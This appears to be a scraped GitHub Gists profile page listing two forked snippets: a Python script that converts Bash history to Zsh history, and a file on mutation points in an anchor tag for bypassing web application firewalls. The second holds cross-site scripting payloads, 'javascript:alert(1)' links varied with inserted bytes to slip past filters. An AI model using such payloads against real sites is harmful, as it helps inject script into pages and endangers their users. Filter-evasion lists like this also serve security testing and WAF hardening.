Skip to content

Instantly share code, notes, and snippets.

View Lamber-maybe's full-sized avatar
💭
肆意向上,野蛮成长。グッ!(๑•̀ㅂ•́)و✧

Lamber Lamber-maybe

💭
肆意向上,野蛮成长。グッ!(๑•̀ㅂ•́)و✧
View GitHub Profile
@Lamber-maybe
Lamber-maybe / bash-to-zsh-hist.py
Created October 31, 2024 02:34 — forked from muendelezaji/bash-to-zsh-hist.py
Convert Bash history to Zsh history
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This is how I used it:
# $ cat ~/.bash_history | python bash-to-zsh-hist.py >> ~/.zsh_history
import sys
import time
@Lamber-maybe
Lamber-maybe / mutation_a.txt
Created February 14, 2023 07:40 — forked from 0xSojalSec/mutation_a.txt
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]